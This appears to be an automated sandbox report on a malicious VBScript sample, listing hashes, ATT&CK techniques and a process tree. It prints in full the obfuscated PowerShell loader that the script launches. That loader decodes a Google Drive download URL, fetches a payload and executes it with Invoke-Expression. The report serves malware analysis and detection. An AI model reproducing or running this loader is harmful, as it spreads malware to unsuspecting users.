0c6de26e743891ec40db9d81fc5121ef74f7270b6380e592b9fc348ee371054f

General

Target

f0faf14409482a52de11a52384c0a7dd0067f13f7063d61fe400e0a5cbf5df8d.vbs
Size

210KB
MD5

5c629502f5f297b1473c1288daef4815
SHA1

c1339b52ef4f18e1bc269d928bbf85387d17b3e4
SHA256

f0faf14409482a52de11a52384c0a7dd0067f13f7063d61fe400e0a5cbf5df8d
SHA512

e4f7951973b8a19231acd3afca20ea0a4dc479d039cef2a5634cacefad9261006bfbea7288d444725cfb7e8e5aa9f33891779d68fa393fe0b60404b7a6664ec2
SSDEEP

6144:iYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJfcqNZ:X2dOtzRn

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	1604	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	drive.google.com
9	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f0faf14409482a52de11a52384c0a7dd0067f13f7063d61fe400e0a5cbf5df8d.vbs"
1⤵
- Blocklisted process makes network request
PID:1604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Virksomhedskundes = 1;$Urfolks='Substrin';$Urfolks+='g';Function Mediaevalize($Lejen){$Kvintetten=$Lejen.Length-$Virksomhedskundes;For($Lapperiet=5; $Lapperiet -lt $Kvintetten; $Lapperiet+=(6)){$Electrizable+=$Lejen.$Urfolks.Invoke($Lapperiet, $Virksomhedskundes);}$Electrizable;}function Bryllupsgaven($Patosens){& ($Lutz) ($Patosens);}$Cater=Mediaevalize 'AcetoM.verioRedimzJ,rrai Ribal Nerol Ki,haForsa/ Drib5 Anam.Mult 0 Bver deno(TrafiWT rbaiRude nSotoldArabio E.edwT.lexs Balk VirkeN .verTErhve hyste1Unboh0 .isi. Unco0 ,bdi;Bovls blaffW ilociAmorfn Velo6forbu4Tilsa;Natur Basswx Bagh6S,ocr4Linje; Trag Gynecr Exciv.crat:Balli1Tagal2Konto1 Li,t. Kuwa0Demar)R.spe DeliGListeeMachic Havrkacetoo Dis /,tpar2Sh,pw0Const1Juste0Fastp0Pishi1u.kld0Skryd1U,cia AlainFSend iKursvrDroite Selsf VandoS bylxMisaw/Rad o1Servi2Dunst1Pas,e. Dute0P rqu ';$Pldere=Mediaevalize ' IndkUWedelsUs,rme,owdyrLarin-ReechAUnsangBelgne KitcnPassatudfrl ';$Prajer=Mediaevalize 'Rest,h IndstPolemtWycl p TablsSwowe: Svrd/ Tekk/psykidNemalr Carui Jallv WarseMater.AkkorgOc looArthroDurangGladil,etrieChe.r.SkytscBengtoaltrumomd,e/UnderuM.nopcr,der?GenneeK ravxForrapsysteoTemadrBuccit Klag= Su,kd paahoLegatwFletfnHjemglA.ernoSkirlaPagandAdopt&SterniSlovad Sand=Mdere1Edibiremendf.erryXC oppsAarh.O DissSBeerbCP.ychaKotwa4trykfYRhythpKnal p wan,cUnifolAlkovEin.coICrepibgi.thKMange6Forsoenotocudisg,RK.desuMaxil_AdmeaH Phys2 Hype0HvalfP .yredVerifJUdsulHStude7 Be.o ';$Synchondrosially=Mediaevalize 'Swin.>Excog ';$Lutz=Mediaevalize 'Indogi ,alaeMyeloxPa.se ';$Tilvejebringes = Mediaevalize 'CollaeDisancMaskihSjipnoCicer Needl%Anoina iskep WorkpVandmdUgesta Par,tStregaRu.tn% For.\ GardMCeropiAnt.rl MacroGabonsAd,es.HvoribEt,anlBent,aBodyl Noiso&Go se& xyha Tosk,e Antic ellhRapidoInd.r Termi$Krost ';Bryllupsgaven (Mediaevalize 'Posr $ByrthgTet,rl Sndeo,fstnbWa seaBr avl.arri:GolfeBCottaeDerivs Kon,kCar oi Malfn SnifnRevele BrottTrons=Forsk(BardecJyskhmkaj.adPilot Frerp/ VuggcOnera Archb$PelseTAlgoriDidyml Ki kvGa cheSkovrjFrs,ee.ebleb Akkur aaskiUnsolnOverigDy,klec slusExcu,)be.or ');Bryllupsgaven (Mediaevalize 'F ren$IntrogSmudslDiantoUnlifbfifleaKnighlBlueb:Te,tiFCamphlQurshadol.as EftekLecane Udsup stejo ,ostsUnreatOveraeKrognnTris,=I,dte$SlovePskru,rLimuaa.laahjCharteImmunr Obla. FolksWaganpE pepl.ewaki absotTekst(Ind,a$UnsquS FostypolygnProfic.lecthra,ulotonednSpadedForhar ,ereoAutocssangsiKap laEfterlStop lTabley Marg)Filan ');$Prajer=$Flaskeposten[0];Bryllupsgaven (Mediaevalize 'Kul l$Arke g ThealImau.oWholibbedeaa Empul Spie:IntroSFo.eseVasoemT.dlnbclotul,ugeneMu,ti=AgripNSkru e H zew Tog,-G telOregiobspdbrjFylkee,ucofc RometDo.ns SkattSR paryDamsps.ogtrt RadeeConqumOttar.YelpeNBisameMargitUdfal.T.rteWIndkoeBalsab SolfCI.dfllKa.teiTo.vie StaknVarmetAfgre ');Bryllupsgaven (Mediaevalize ' Ad i$FrateSAs.rieHauntmFiskebCalablSonnee King.op prHLnproe,pflaaForgodElevpeIncharHringsEjend[Sphen$PolitPPignolKicksd Frere MegarWhorreKondu] Misr=Forre$,ultiCAlphoaUnivetLoftseForskrBrode ');$Diftongeringen=Mediaevalize 'VigtiS.lndeeBequemKlem.bUn,lulMinueebrudf.Haf.iDH,epsoSkyhowB.shbnAngrelBrkdeoUnctiaF,brodRegtaF ,onki.drtslRutebe.egne( ord$PleurP Hvisr BeauaSt vejGrapheKraftrRetsp,Direk$BenfrUra conSto ks ,lseu DatabDrgtimSm syiHin,isToutes StudiOm osvAcroseContr)Revap ';$Diftongeringen=$Beskinnet[1]+$Diftongeringen;$Unsubmissive=$Beskinnet[0];Bryllupsgaven (Mediaevalize ' Stra$FormigGuvaclMeet o OverbAffunaUterol Clor:HabilG Oranls.lehuneweleE,ceim.fsviaandennD.oni= Fa e(selskTPervae ,istsLi.oxtMusic-Fo giP Rec aVirk,tOrienhInfor S.st$KommaUN.zilnMonitsPseudu VoldbA.omimRelatiTeksts.cintsOve giretf.vMuseuePyrop)Nauti ');while (!$Glueman) {Bryllupsgaven (Mediaevalize 'Ni,ro$UdskrgFunktlNonmyoorlo bPaynia Co nlPreim:BetalFWindrlStandiRad.umForamf.idnelsydsla SubomSenge=Helge$,etaltGer,nr PhyluSubmied sha ') ;Bryllupsgaven $Diftongeringen;Bryllupsgaven (Mediaevalize ' StanSIllittHukbaa .talrTavletOverd-EnantSabe,alOverfe.istre NedrpZon s Who e4 Wast ');Bryllupsgaven (Mediaevalize 'Va.df$ Babog Su.plTrsk.o Fav.bNonthaAnti,lPreed:ThiosG AndelAdstiu nreeOutstm elgra,aplonParce= Rveh(Bin.eTStic e.amsisNonaftCompa-TonekP,ivalaGra.itAcrolhPre.n Blady$ OptrUAbc,rnAns,asSenoruFo,edb Medhm.ootliUhyresAf.visRemiliCotenv Fr.te,hris) Svej ') ;Bryllupsgaven (Mediaevalize 'Macka$Kem.lgHusholU.skro KnudbafledaSkol l Bas,:OblatHNabobeSkovvnConcuvBilleiEspals Li mnPresciComplnAflgggTidsbeAntidrWhingnlooseeSvrmesPlaty=Armb.$ErythgPros lDom no P ngbSkuffa Perilm,cro:Dec.aS Haa mProfiiStylosSouthk.ektoe,ammedC,gnaeFranksRadio+Skilr+Logco%b nef$ nmerFbespolHjlpeaDriv.sErgsvkHreapeClimapeks.mo Earts FaldtBronzeTurkinIna c.Bajerc Skalo .vovuDoemtnKompltexcur ') ;$Prajer=$Flaskeposten[$Henvisningernes];}Bryllupsgaven (Mediaevalize 'Liman$.ompegSudanlHomoloImmatbAce aaPoly,lMezzo:NglepPSvagslBagh.aNomadnSulphiPr grmVrdimeSeleftSubsirBrandeLlin.sSorte P epl=Param G.ewtGLevereDemoktRabbi- MeteCUncifoSkaernAf.lat R,gieTetran,ldertsoile .arth$displURensenBibl.sAntanu WantbChlormanoasiAfslasPinwhs ExtriSttevvStilleRed,i ');Bryllupsgaven (Mediaevalize ' Ph y$Plexig Podsl TankoweathbPeri,aD,sillA par:AttriMkulmoyMartirAscidr metaaLaw.es.nalc Prote= Mayo Recip[ Afl,SCajonyGeorgsNonchtDemiue PrivmB,ntm.LumbaC elgeoN.dgrn R hnv.domeeDrgforCandltBruge]Molek:douve:wytedFIrre.rKaffeoMunnomU solBSlumma Ludds R ete,entr6Desig4 BarySIsohetKon,lrSaldaiEtiken ImpagV,ole(Statu$ P asPPledglAstriaVolubn ondiiS,ragm,olsjeOutbutStererStatse FiltsIn er)Opsen ');Bryllupsgaven (Mediaevalize 'Try k$NikkegSalvelGenioo Ka.kbInkluaRockelO.dde:CottoESupernListeuScattnCanoncValveiF,rgia utatFly,eiNico.oPromen ArthsAnima Under=Endem Forli[Str cSeleveyBlaass D.rit IniteCastemDeval.Fi skTEkspae,enyaxDishet Komp.UraneEDesegnHerlacBancao F.ngdSelskiUncapn UdsigGtef,]Cent.: Stal:,enziA SlurSUnposC RetiIRe geI Ungd.GaveaGUdsmueTidsttRigsvSLeishtGratirAbiotiSturnnPseu,gBrint( Glas$DecriMPhysiymilier .arvrSyphoaEmetisLiv.r)Dimer ');Bryllupsgaven (Mediaevalize 'Subid$Caverg ShowlP dopoUnguabbimilaVra,gl Patt:TilnrOBombepModt.vIconoaFrem,rPuppemSmitsnf.letiPortanK ntagSte fs nfor=Egenk$,riceESvi,gnReoriuFuglenElastcKannei lotsaObsc,tAnglii boreoCylinnSacchs Stif.S retsHus,luApprobfid.ssHobbytSmaabrPseu,iH,ndrnUnibigA reg(Hercu2Torpi9Isoan1L.vte0risfu4Ridde1Sammm,Term 2Print8Pendu8 Fris2P.aty4D.ift) .nab ');Bryllupsgaven $Opvarmnings;"
  2⤵
  PID:4992
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Milos.bla && echo $"
    3⤵
    PID:4208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3756 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
1⤵
PID:2460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vdvnoirg.yxt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4992-10-0x000002732DC60000-0x000002732DC82000-memory.dmp

Filesize
136KB

Download
memory/4992-15-0x000002732BB40000-0x000002732BB50000-memory.dmp

Filesize
64KB

Download
memory/4992-14-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

Filesize
10.8MB

Download
memory/4992-20-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing